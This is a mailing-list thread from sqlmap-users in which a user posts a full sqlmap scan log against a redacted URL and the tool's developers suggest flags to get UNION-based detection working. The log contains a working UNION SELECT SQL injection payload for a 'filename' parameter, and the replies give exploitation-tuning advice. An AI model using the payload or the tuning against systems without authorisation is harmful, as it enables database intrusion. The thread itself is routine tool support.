Re: [sqlmap-users] MySQL Union technique gives out inconsistent results
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] MySQL Union technique gives out inconsistent results
|
From: Miroslav S. <mir...@gm...> - 2011-07-12 21:17:35
|
ok. i see that you've tried those --time-sec and --technique=U :) now to resume a bit. "Generic UNION injections" are tricky ones. best thing would be if you could send us the -t traffic.txt of --technique=U --flush-session run. kr On Tue, Jul 12, 2011 at 11:13 PM, Miroslav Stampar <mir...@gm...> wrote: > hi all. > > little tutorial for all of you. spot the problematic parts: > > A) > [14:39:55] [WARNING] most probably web server instance hasn't recovered yet from > previous timed based payload. if the problem persists please wait for few minut > es and rerun without flag T in --technique option (e.g. --flush-session --techni > que=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2) > > B) > .... > [14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > ing to retry the request > [14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > ing to retry the request > .... > > C) do you want to exploit this SQL injection? [Y/n] Y > [14:40:13] [INFO] testing MySQL > [14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > ing to retry the request > [14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > ing to retry the request > [14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > ing to retry the request > [14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the > next form > > now. do you see the problem yourself? > > that warning message says it all. have you tried lowering the > --time-sec value? have you tried running with --technique=BEUS? > > thing is that in INNER JOIN cases injecting TIME BASED payloads can do > lots of "[CRITICAL]" messages. hence that nice warning message :) > > kr > > On Tue, Jul 12, 2011 at 10:49 PM, Bernardo Damele A. G. > <ber...@gm...> wrote: >> Hi Joahnna, >> >> Try to provide --union-char and --union-cols after you have verified >> the UNION query SQL injection manually in your browser. >> Rerun with --flush-session and -t traffic.log and inspect the log file >> afterwards to see if the SQL payload is indeed part of the HTTP >> response you expect it. >> If the fingerprint keeps failing, provide sqlmap with --dbms "mysql 5". >> >> Bernardo >> >> >> On 12 July 2011 14:32, Joahnna Marie Damiao <dam...@ya...> wrote: >>> >>> Hi, >>> Below is the sqlmap command. Next time I ran it, it already says that the parameter filename is not injectable. However, I always get an info that the target URL is UNION injectable but the number of columns change every session. I also used the --technique=U --dbms=mysql --flush-session --level=3 --risk=3 and even the --time-sec=2 but I only get UNION injectable message but nothing is vulnerable. What seems to be the problem here? Anybody can help me? >>> >>> C:\Python27\sqlmap>python sqlmap.py -u "xxxxxxx" --forms --b >>> >>> atch --beep >>> >>> >>> >>> sqlmap/1.0-dev (r4221) - automatic SQL injection and database takeover tool >>> >>> http://www.sqlmap.org >>> >>> >>> >>> [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual >>> >>> consent is illegal. It is the end user's responsibility to obey all applicable >>> >>> local, state and federal laws. Authors assume no liability and are not responsib >>> >>> le for any misuse or damage caused by this program >>> >>> >>> >>> [*] starting at 14:39:37 >>> >>> >>> >>> [14:39:37] [INFO] setting file for logging HTTP traffic >>> >>> [14:39:37] [INFO] testing connection to the target url >>> >>> [14:39:38] [INFO] searching for forms >>> >>> [#1] form: [INFO] >>> >>> GET xxxxxxxxx >>> >>> do you want to test this form? [Y/n/q] >>> >>> > Y >>> >>> Edit GET data [default: xxxxxxxx >>> >>> do you want to fill blank fields with random values? [Y/n] Y >>> >>> [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\xxxx\session' as sessi >>> >>> on file >>> >>> [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' >>> >>> as results file >>> >>> [14:39:38] [INFO] testing if the url is stable, wait a few seconds >>> >>> [14:39:39] [INFO] url is stable >>> >>> [14:39:39] [INFO] testing if GET parameter 'productid' is dynamic >>> >>> [14:39:39] [WARNING] GET parameter 'productid' appears to be not dynamic >>> >>> [14:39:39] [WARNING] heuristic test shows that GET parameter 'productid' might n >>> >>> ot be injectable >>> >>> [14:39:39] [INFO] testing sql injection on GET parameter 'productid' >>> >>> [14:39:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' >>> >>> [14:39:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause >>> >>> ' >>> >>> [14:39:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' >>> >>> [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o >>> >>> r HAVING clause' >>> >>> [14:39:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT >>> >>> ype)' >>> >>> [14:39:40] [INFO] testing 'MySQL > 5.0.11 stacked queries' >>> >>> [14:39:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries' >>> >>> [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' >>> >>> [14:39:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >>> >>> [14:39:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' >>> >>> [14:39:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' >>> >>> [14:39:41] [INFO] testing 'Oracle AND time-based blind' >>> >>> [14:39:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >>> >>> [14:39:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >>> >>> [14:39:42] [WARNING] using unescaped version of the test because of zero knowled >>> >>> ge of the back-end DBMS. you can try to explicitly set it using the --dbms optio >>> >>> n >>> >>> [14:39:44] [WARNING] GET parameter 'productid' is not injectable >>> >>> [14:39:44] [INFO] testing if GET parameter 'name' is dynamic >>> >>> [14:39:44] [WARNING] GET parameter 'name' appears to be not dynamic >>> >>> [14:39:44] [WARNING] heuristic test shows that GET parameter 'name' might not be >>> >>> injectable >>> >>> [14:39:44] [INFO] testing sql injection on GET parameter 'name' >>> >>> [14:39:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' >>> >>> [14:39:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause >>> >>> ' >>> >>> [14:39:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' >>> >>> [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o >>> >>> r HAVING clause' >>> >>> [14:39:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT >>> >>> ype)' >>> >>> [14:39:45] [INFO] testing 'MySQL > 5.0.11 stacked queries' >>> >>> [14:39:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries' >>> >>> [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' >>> >>> [14:39:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >>> >>> [14:39:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' >>> >>> [14:39:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' >>> >>> [14:39:46] [INFO] testing 'Oracle AND time-based blind' >>> >>> [14:39:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >>> >>> [14:39:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:39:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >>> >>> [14:39:50] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:39:51] [WARNING] GET parameter 'name' is not injectable >>> >>> [14:39:51] [INFO] testing if GET parameter 'filename' is dynamic >>> >>> [14:39:52] [WARNING] GET parameter 'filename' appears to be not dynamic >>> >>> [14:39:52] [WARNING] heuristic test shows that GET parameter 'filename' might no >>> >>> t be injectable >>> >>> [14:39:52] [INFO] testing sql injection on GET parameter 'filename' >>> >>> [14:39:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' >>> >>> [14:39:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:39:53] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:39:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause >>> >>> ' >>> >>> [14:39:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' >>> >>> [14:39:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o >>> >>> r HAVING clause' >>> >>> [14:39:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT >>> >>> ype)' >>> >>> [14:39:55] [INFO] testing 'MySQL > 5.0.11 stacked queries' >>> >>> [14:39:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries' >>> >>> [14:39:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' >>> >>> [14:39:55] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:39:55] [WARNING] most probably web server instance hasn't recovered yet from >>> >>> previous timed based payload. if the problem persists please wait for few minut >>> >>> es and rerun without flag T in --technique option (e.g. --flush-session --techni >>> >>> que=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2) >>> >>> [14:39:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >>> >>> [14:39:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' >>> >>> [14:39:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' >>> >>> [14:39:56] [INFO] testing 'Oracle AND time-based blind' >>> >>> [14:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >>> >>> [14:39:57] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >>> >>> [14:40:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:07] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:08] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:09] [CRITICAL] unable to connect to the target url or proxy >>> >>> [14:40:09] [INFO] target url appears to be UNION injectable with 10 columns >>> >>> [14:40:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:13] [CRITICAL] unable to connect to the target url or proxy >>> >>> [14:40:13] [INFO] GET parameter 'filename' is 'Generic UNION query (NULL) - 1 to >>> >>> 10 columns' injectable >>> >>> GET parameter 'filename' is vulnerable. Do you want to keep testing the others? >>> >>> [y/N] N >>> >>> sqlmap identified the following injection points with a total of 414 HTTP(s) req >>> >>> uests: >>> >>> --- >>> >>> Place: GET >>> >>> Parameter: filename >>> >>> Type: UNION query >>> >>> Title: Generic UNION query (NULL) - 1 to 10 columns >>> >>> Payload: productid=Bbvv&name=ihOH&filename=BVux' UNION ALL SELECT NULL, 'xsD >>> >>> iekxuxW', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Aege'='Aege&cre >>> >>> ationdate=OnGh&encodingformat=AZfu&productgroup=NdSR&producepriority=FatH&isacti >>> >>> ve=on&comment=uPni >>> >>> --- >>> >>> >>> >>> do you want to exploit this SQL injection? [Y/n] Y >>> >>> [14:40:13] [INFO] testing MySQL >>> >>> [14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >>> >>> ing to retry the request >>> >>> [14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the >>> >>> next form >>> >>> [14:40:16] [INFO] you can find results of scanning in multiple targets mode insi >>> >>> de the CSV file 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' >>> >>> >>> >>> [*] shutting down at 14:40:16 >>> >>> ------------------------------------------------------------------------------ >>> All of the data generated in your IT infrastructure is seriously valuable. >>> Why? It contains a definitive record of application performance, security >>> threats, fraudulent activity, and more. Splunk takes this data and makes >>> sense of it. IT sense. And common sense. >>> http://p.sf.net/sfu/splunk-d2d-c2 >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> >> >> >> -- >> Bernardo Damele A. G. >> >> E-mail / Jabber: bernardo.damele (at) gmail.com >> Mobile: +447788962949 (UK 07788962949) >> PGP Key ID: Unavailable >> >> ------------------------------------------------------------------------------ >> AppSumo Presents a FREE Video for the SourceForge Community by Eric >> Ries, the creator of the Lean Startup Methodology on "Lean Startup >> Secrets Revealed." This video shows you how to validate your ideas, >> optimize your ideas and identify your business strategy. >> http://p.sf.net/sfu/appsumosfdev2dev >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar (@stamparm) > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
